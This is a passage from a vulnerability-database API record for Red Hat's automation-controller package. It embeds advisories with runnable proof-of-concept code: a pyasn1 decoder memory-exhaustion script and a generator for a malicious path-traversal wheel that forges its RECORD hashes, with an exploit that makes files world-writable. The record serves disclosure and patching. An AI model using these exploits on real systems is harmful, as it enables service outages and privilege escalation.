Package Instance
Look up vulnerable packages by Package URL (purl).
GET /api/packages/87295?format=api
{ "url": "http://public2.vulnerablecode.io/api/packages/87295?format=api", "purl": "pkg:rpm/redhat/automation-controller@4.6.26-1?arch=el9ap", "type": "rpm", "namespace": "redhat", "name": "automation-controller", "version": "4.6.26-1", "qualifiers": { "arch": "el9ap" }, "subpath": "", "is_vulnerable": true, "next_non_vulnerable_version": null, "latest_non_vulnerable_version": null, "affected_by_vulnerabilities": [ { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/20254?format=api", "vulnerability_id": "VCID-bptp-5gn6-eucd", "summary": "pyasn1 has a DoS vulnerability in decoder\n### Summary\n\nAfter reviewing pyasn1 v0.6.1 a Denial-of-Service issue has been found that leads to memory exhaustion from malformed RELATIVE-OID with excessive continuation octets.\n\n### Details\n\nThe integer issue can be found in the decoder as `reloid += ((subId << 7) + nextSubId,)`: https://github.com/pyasn1/pyasn1/blob/main/pyasn1/codec/ber/decoder.py#L496\n\n### PoC\n\nFor the DoS:\n```py\nimport pyasn1.codec.ber.decoder as decoder\nimport pyasn1.type.univ as univ\nimport sys\nimport resource\n\n# Deliberately set memory limit to display PoC\ntry:\n resource.setrlimit(resource.RLIMIT_AS, (100*1024*1024, 100*1024*1024))\n print(\"[*] Memory limit set to 100MB\")\nexcept:\n print(\"[-] Could not set memory limit\")\n\n# Test with different payload sizes to find the DoS threshold\npayload_size_mb = int(sys.argv[1])\n\nprint(f\"[*] Testing with {payload_size_mb}MB payload...\")\n\npayload_size = payload_size_mb * 1024 * 1024\n# Create payload with continuation octets\n# Each 0x81 byte indicates continuation, causing bit shifting in decoder\npayload = b'\\x81' * payload_size + b'\\x00'\nlength = len(payload)\n\n# DER length encoding (supports up to 4GB)\nif length < 128:\n length_bytes = bytes([length])\nelif length < 256:\n length_bytes = b'\\x81' + length.to_bytes(1, 'big')\nelif length < 256**2:\n length_bytes = b'\\x82' + length.to_bytes(2, 'big')\nelif length < 
256**3:\n length_bytes = b'\\x83' + length.to_bytes(3, 'big')\nelse:\n # 4 bytes can handle up to 4GB\n length_bytes = b'\\x84' + length.to_bytes(4, 'big')\n\n# Use OID (0x06) for more aggressive parsing\nmalicious_packet = b'\\x06' + length_bytes + payload\n\nprint(f\"[*] Packet size: {len(malicious_packet) / 1024 / 1024:.1f} MB\")\n\ntry:\n print(\"[*] Decoding (this may take time or exhaust memory)...\")\n result = decoder.decode(malicious_packet, asn1Spec=univ.ObjectIdentifier())\n\n print(f'[+] Decoded successfully')\n print(f'[!] Object size: {sys.getsizeof(result[0])} bytes')\n\n # Try to convert to string\n print('[*] Converting to string...')\n try:\n str_result = str(result[0])\n print(f'[+] String succeeded: {len(str_result)} chars')\n if len(str_result) > 10000:\n print(f'[!] MEMORY EXPLOSION: {len(str_result)} character string!')\n except MemoryError:\n print(f'[-] MemoryError during string conversion!')\n except Exception as e:\n print(f'[-] {type(e).__name__} during string conversion')\n\nexcept MemoryError:\n print('[-] MemoryError: Out of memory!')\nexcept Exception as e:\n print(f'[-] Error: {type(e).__name__}: {e}')\n\n\nprint(\"\\n[*] Test completed\")\n```\n\n\nScreenshots with the results:\n\n#### DoS\n<img width=\"944\" height=\"207\" alt=\"Screenshot_20251219_160840\" src=\"https://github.com/user-attachments/assets/68b9566b-5ee1-47b0-a269-605b037dfc4f\" />\n\n<img width=\"931\" height=\"231\" alt=\"Screenshot_20251219_152815\" src=\"https://github.com/user-attachments/assets/62eacf4f-eb31-4fba-b7a8-e8151484a9fa\" />\n\n#### Leak analysis\n\nA potential heap leak was investigated but came back clean:\n```\n[*] Creating 1000KB payload...\n[*] Decoding with pyasn1...\n[*] Materializing to string...\n[+] Decoded 2157784 characters\n[+] Binary representation: 896001 bytes\n[+] Dumped to heap_dump.bin\n\n[*] First 64 bytes (hex):\n 
01020408102040810204081020408102040810204081020408102040810204081020408102040810204081020408102040810204081020408102040810204081\n\n[*] First 64 bytes (ASCII/hex dump):\n 0000: 01 02 04 08 10 20 40 81 02 04 08 10 20 40 81 02 ..... @..... @..\n 0010: 04 08 10 20 40 81 02 04 08 10 20 40 81 02 04 08 ... @..... @....\n 0020: 10 20 40 81 02 04 08 10 20 40 81 02 04 08 10 20 . @..... @..... \n 0030: 40 81 02 04 08 10 20 40 81 02 04 08 10 20 40 81 @..... @..... @.\n\n[*] Digit distribution analysis:\n '0': 10.1%\n '1': 9.9%\n '2': 10.0%\n '3': 9.9%\n '4': 9.9%\n '5': 10.0%\n '6': 10.0%\n '7': 10.0%\n '8': 9.9%\n '9': 10.1%\n```\n\n### Scenario\n\n1. An attacker creates a malicious X.509 certificate.\n2. The application validates certificates.\n3. The application accepts the malicious certificate and tries decoding resulting in the issues mentioned above.\n\n### Impact\n\nThis issue can affect resource consumption and hang systems or stop services.\nThis may affect:\n- LDAP servers\n- TLS/SSL endpoints\n- OCSP responders\n- etc.\n\n### Recommendation\n\nAdd a limit to the allowed bytes in the decoder.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-23490.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-23490.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-23490", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.05876", "published_at": "2026-04-29T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.05866", "published_at": "2026-04-26T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.05829", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00021", 
"scoring_system": "epss", "scoring_elements": "0.05797", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.05649", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.05637", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.05682", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.05688", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.05696", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.05716", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.0569", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.05652", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.05659", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.05618", "published_at": "2026-04-02T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-23490" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-23490", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-23490" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/pyasn1/pyasn1", 
"reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyasn1/pyasn1" }, { "reference_url": "https://github.com/pyasn1/pyasn1/blob/0f07d7242a78ab4d129b26256d7474f7168cf536/pyasn1/codec/ber/decoder.py#L496", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyasn1/pyasn1/blob/0f07d7242a78ab4d129b26256d7474f7168cf536/pyasn1/codec/ber/decoder.py#L496" }, { "reference_url": "https://github.com/pyasn1/pyasn1/commit/3908f144229eed4df24bd569d16e5991ace44970", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-01-16T19:23:28Z/" } ], "url": "https://github.com/pyasn1/pyasn1/commit/3908f144229eed4df24bd569d16e5991ace44970" }, { "reference_url": "https://github.com/pyasn1/pyasn1/commit/be353d755f42ea36539b4f5053c652ddf56979a6", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pyasn1/pyasn1/commit/be353d755f42ea36539b4f5053c652ddf56979a6" }, { "reference_url": "https://github.com/pyasn1/pyasn1/releases/tag/v0.6.2", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", 
"scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-01-16T19:23:28Z/" } ], "url": "https://github.com/pyasn1/pyasn1/releases/tag/v0.6.2" }, { "reference_url": "https://github.com/pyasn1/pyasn1/security/advisories/GHSA-63vm-454h-vhhq", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-01-16T19:23:28Z/" } ], "url": "https://github.com/pyasn1/pyasn1/security/advisories/GHSA-63vm-454h-vhhq" }, { "reference_url": "https://lists.debian.org/debian-lts-announce/2026/02/msg00002.html", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://lists.debian.org/debian-lts-announce/2026/02/msg00002.html" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23490", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23490" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1125753", "reference_id": "1125753", "reference_type": "", "scores": [], "url": 
"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1125753" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430472", "reference_id": "2430472", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430472" }, { "reference_url": "https://github.com/advisories/GHSA-63vm-454h-vhhq", "reference_id": "GHSA-63vm-454h-vhhq", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-63vm-454h-vhhq" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:1903", "reference_id": "RHSA-2026:1903", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:1903" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:1904", "reference_id": "RHSA-2026:1904", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:1904" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:1905", "reference_id": "RHSA-2026:1905", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:1905" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:1906", "reference_id": "RHSA-2026:1906", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:1906" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:2221", "reference_id": "RHSA-2026:2221", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:2221" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:2299", "reference_id": "RHSA-2026:2299", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:2299" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:2300", "reference_id": "RHSA-2026:2300", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:2300" }, { "reference_url": 
"https://access.redhat.com/errata/RHSA-2026:2302", "reference_id": "RHSA-2026:2302", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:2302" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:2303", "reference_id": "RHSA-2026:2303", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:2303" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:2309", "reference_id": "RHSA-2026:2309", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:2309" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:2453", "reference_id": "RHSA-2026:2453", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:2453" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:2460", "reference_id": "RHSA-2026:2460", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:2460" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:2483", "reference_id": "RHSA-2026:2483", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:2483" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:2486", "reference_id": "RHSA-2026:2486", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:2486" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:2712", "reference_id": "RHSA-2026:2712", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:2712" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:2758", "reference_id": "RHSA-2026:2758", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:2758" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:3354", "reference_id": "RHSA-2026:3354", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:3354" }, { "reference_url": 
"https://access.redhat.com/errata/RHSA-2026:3359", "reference_id": "RHSA-2026:3359", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:3359" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:3958", "reference_id": "RHSA-2026:3958", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:3958" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:3959", "reference_id": "RHSA-2026:3959", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:3959" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:4138", "reference_id": "RHSA-2026:4138", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:4138" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:4139", "reference_id": "RHSA-2026:4139", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:4139" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:4140", "reference_id": "RHSA-2026:4140", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:4140" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:4141", "reference_id": "RHSA-2026:4141", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:4141" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:4142", "reference_id": "RHSA-2026:4142", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:4142" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:4143", "reference_id": "RHSA-2026:4143", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:4143" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:4144", "reference_id": "RHSA-2026:4144", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:4144" }, { "reference_url": 
"https://access.redhat.com/errata/RHSA-2026:4145", "reference_id": "RHSA-2026:4145", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:4145" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:4146", "reference_id": "RHSA-2026:4146", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:4146" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:4147", "reference_id": "RHSA-2026:4147", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:4147" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:4148", "reference_id": "RHSA-2026:4148", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:4148" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:4943", "reference_id": "RHSA-2026:4943", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:4943" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:5606", "reference_id": "RHSA-2026:5606", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:5606" }, { "reference_url": "https://usn.ubuntu.com/7975-1/", "reference_id": "USN-7975-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7975-1/" }, { "reference_url": "https://usn.ubuntu.com/8134-1/", "reference_id": "USN-8134-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/8134-1/" } ], "fixed_packages": [], "aliases": [ "CVE-2026-23490", "GHSA-63vm-454h-vhhq" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-bptp-5gn6-eucd" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/20550?format=api", "vulnerability_id": "VCID-fm8w-bycx-4yex", "summary": "Wheel Affected by Arbitrary File Permission Modification via Path Traversal in wheel unpack\n### Summary\n - 
**Vulnerability Type:** Path Traversal (CWE-22) leading to Arbitrary File Permission Modification. \n - **Root Cause Component:** wheel.cli.unpack.unpack function. \n - **Affected Packages:** \n 1. wheel (Upstream source) \n 2. setuptools (Downstream, vendors wheel) \n - **Severity:** High (Allows modifying system file permissions). \n\n### Details \nThe vulnerability exists in how the unpack function handles file permissions after extraction. The code blindly trusts the filename from the archive header for the chmod operation, even though the extraction process itself might have sanitized the path. \n```\n# Vulnerable Code Snippet (present in both wheel and setuptools/_vendor/wheel)\nfor zinfo in wf.filelist:\n wf.extract(zinfo, destination) # (1) Extraction is handled safely by zipfile\n\n # (2) VULNERABILITY:\n # The 'permissions' are applied to a path constructed using the UNSANITIZED 'zinfo.filename'.\n # If zinfo.filename contains \"../\", this targets files outside the destination.\n permissions = zinfo.external_attr >> 16 & 0o777\n destination.joinpath(zinfo.filename).chmod(permissions)\n``` \n\n### PoC \nI have confirmed this exploit works against the unpack function imported from setuptools._vendor.wheel.cli.unpack. \n\n**Prerequisites:** pip install setuptools \n\n**Step 1: Generate the Malicious Wheel (gen_poc.py)** \nThis script creates a wheel that passes internal hash validation but contains a directory traversal payload in the file list. 
\n```\nimport zipfile\nimport hashlib\nimport base64\nimport os\n\ndef urlsafe_b64encode(data):\n \"\"\"\n Helper function to encode data using URL-safe Base64 without padding.\n Required by the Wheel file format specification.\n \"\"\"\n return base64.urlsafe_b64encode(data).rstrip(b'=').decode('ascii')\n\ndef get_hash_and_size(data_bytes):\n \"\"\"\n Calculates SHA-256 hash and size of the data.\n These values are required to construct a valid 'RECORD' file,\n which is used by the 'wheel' library to verify integrity.\n \"\"\"\n digest = hashlib.sha256(data_bytes).digest()\n hash_str = \"sha256=\" + urlsafe_b64encode(digest)\n return hash_str, str(len(data_bytes))\n\ndef create_evil_wheel_v4(filename=\"evil-1.0-py3-none-any.whl\"):\n print(f\"[Generator V4] Creating 'Authenticated' Malicious Wheel: (unknown)\")\n\n # 1. Prepare Standard Metadata Content\n # These are minimal required contents to make the wheel look legitimate.\n wheel_content = b\"Wheel-Version: 1.0\\nGenerator: bdist_wheel (0.37.1)\\nRoot-Is-Purelib: true\\nTag: py3-none-any\\n\"\n metadata_content = b\"Metadata-Version: 2.1\\nName: evil\\nVersion: 1.0\\nSummary: PoC Package\\n\"\n \n # 2. Define Malicious Payload (Path Traversal)\n # The content doesn't matter, but the path does.\n payload_content = b\"PWNED by Path Traversal\"\n\n # [ATTACK VECTOR]: Target a file OUTSIDE the extraction directory using '../'\n # The vulnerability allows 'chmod' to affect this path directly.\n malicious_path = \"../../poc_target.txt\"\n\n # 3. Calculate Hashes for Integrity Check Bypass\n # The 'wheel' library verifies if the file hash matches the RECORD entry.\n # To bypass this check, we calculate the correct hash for our malicious file.\n wheel_hash, wheel_size = get_hash_and_size(wheel_content)\n metadata_hash, metadata_size = get_hash_and_size(metadata_content)\n payload_hash, payload_size = get_hash_and_size(payload_content)\n\n # 4. 
Construct the 'RECORD' File\n # The RECORD file lists all files in the wheel with their hashes.\n # CRITICAL: We explicitly register the malicious path ('../../poc_target.txt') here.\n # This tricks the 'wheel' library into treating the malicious file as a valid, verified component.\n record_lines = [\n f\"evil-1.0.dist-info/WHEEL,{wheel_hash},{wheel_size}\",\n f\"evil-1.0.dist-info/METADATA,{metadata_hash},{metadata_size}\",\n f\"{malicious_path},{payload_hash},{payload_size}\", # <-- Authenticating the malicious path\n \"evil-1.0.dist-info/RECORD,,\"\n ]\n record_content = \"\\n\".join(record_lines).encode('utf-8')\n\n # 5. Build the Zip File\n with zipfile.ZipFile(filename, \"w\") as zf:\n # Write standard metadata files\n zf.writestr(\"evil-1.0.dist-info/WHEEL\", wheel_content)\n zf.writestr(\"evil-1.0.dist-info/METADATA\", metadata_content)\n zf.writestr(\"evil-1.0.dist-info/RECORD\", record_content)\n\n # [EXPLOIT CORE]: Manually craft ZipInfo for the malicious file\n # We need to set specific permission bits to trigger the vulnerability.\n zinfo = zipfile.ZipInfo(malicious_path)\n \n # Set external attributes to 0o777 (rwxrwxrwx)\n # Upper 16 bits: File type (0o100000 = Regular File)\n # Lower 16 bits: Permissions (0o777 = World Writable)\n # The vulnerable 'unpack' function will blindly apply this '777' to the system file.\n zinfo.external_attr = (0o100000 | 0o777) << 16\n \n zf.writestr(zinfo, payload_content)\n\n print(\"[Generator V4] Done. Malicious file added to RECORD and validation checks should pass.\")\n\nif __name__ == \"__main__\":\n create_evil_wheel_v4()\n``` \n\n**Step 2: Run the Exploit (exploit.py)** \n```\nfrom pathlib import Path\nimport sys\n\n# Demonstrating impact on setuptools\ntry:\n from setuptools._vendor.wheel.cli.unpack import unpack\n print(\"[*] Loaded unpack from setuptools\")\nexcept ImportError:\n from wheel.cli.unpack import unpack\n print(\"[*] Loaded unpack from wheel\")\n\n# 1. 
Setup Target (Read-Only system file simulation)\ntarget = Path(\"poc_target.txt\")\ntarget.write_text(\"SENSITIVE CONFIG\")\ntarget.chmod(0o400) # Read-only\nprint(f\"[*] Initial Perms: {oct(target.stat().st_mode)[-3:]}\")\n\n# 2. Run Vulnerable Unpack\n# The wheel contains \"../../poc_target.txt\".\n# unpack() will extract safely, BUT chmod() will hit the actual target file.\ntry:\n unpack(\"evil-1.0-py3-none-any.whl\", \"unpack_dest\")\nexcept Exception as e:\n print(f\"[!] Ignored expected extraction error: {e}\")\n\n# 3. Check Result\nfinal_perms = oct(target.stat().st_mode)[-3:]\nprint(f\"[*] Final Perms: {final_perms}\")\n\nif final_perms == \"777\":\n print(\"VULNERABILITY CONFIRMED: Target file is now world-writable (777)!\")\nelse:\n print(\"[-] Attack failed.\")\n``` \n\n**result:** \n<img width=\"806\" height=\"838\" alt=\"image\" src=\"https://github.com/user-attachments/assets/f750eb3b-36ea-445c-b7f4-15c14eb188db\" /> \n \n### Impact \nAttackers can craft a malicious wheel file that, when unpacked, changes the permissions of critical system files (e.g., /etc/passwd, SSH keys, config files) to 777. This allows for Privilege Escalation or arbitrary code execution by modifying now-writable scripts. \n\n### Recommended Fix \nThe unpack function must not use zinfo.filename for post-extraction operations. It should use the sanitized path returned by wf.extract(). 
\n\n### Suggested Patch: \n```\n# extract() returns the actual path where the file was written\nextracted_path = wf.extract(zinfo, destination)\n\n# Only apply chmod if a file was actually written\nif extracted_path:\n permissions = zinfo.external_attr >> 16 & 0o777\n Path(extracted_path).chmod(permissions)\n```", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-24049.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-24049.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-24049", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00013", "scoring_system": "epss", "scoring_elements": "0.01973", "published_at": "2026-04-29T12:55:00Z" }, { "value": "0.00013", "scoring_system": "epss", "scoring_elements": "0.01905", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00013", "scoring_system": "epss", "scoring_elements": "0.01918", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00013", "scoring_system": "epss", "scoring_elements": "0.01917", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00013", "scoring_system": "epss", "scoring_elements": "0.01919", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00013", "scoring_system": "epss", "scoring_elements": "0.01933", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00013", "scoring_system": "epss", "scoring_elements": "0.01901", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00013", "scoring_system": "epss", "scoring_elements": "0.01896", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00013", "scoring_system": "epss", "scoring_elements": "0.01877", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00013", "scoring_system": "epss", "scoring_elements": "0.01875", "published_at": 
"2026-04-18T12:55:00Z" }, { "value": "0.00013", "scoring_system": "epss", "scoring_elements": "0.01961", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00013", "scoring_system": "epss", "scoring_elements": "0.01948", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00013", "scoring_system": "epss", "scoring_elements": "0.01943", "published_at": "2026-04-26T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-24049" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/pypa/wheel", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pypa/wheel" }, { "reference_url": "https://github.com/pypa/wheel/commit/7a7d2de96b22a9adf9208afcc9547e1001569fef", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-22T12:24:28Z/" } ], "url": "https://github.com/pypa/wheel/commit/7a7d2de96b22a9adf9208afcc9547e1001569fef" }, { "reference_url": "https://github.com/pypa/wheel/commit/934fe177ff912c8e03d5ae951d3805e1fd90ba5e", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": 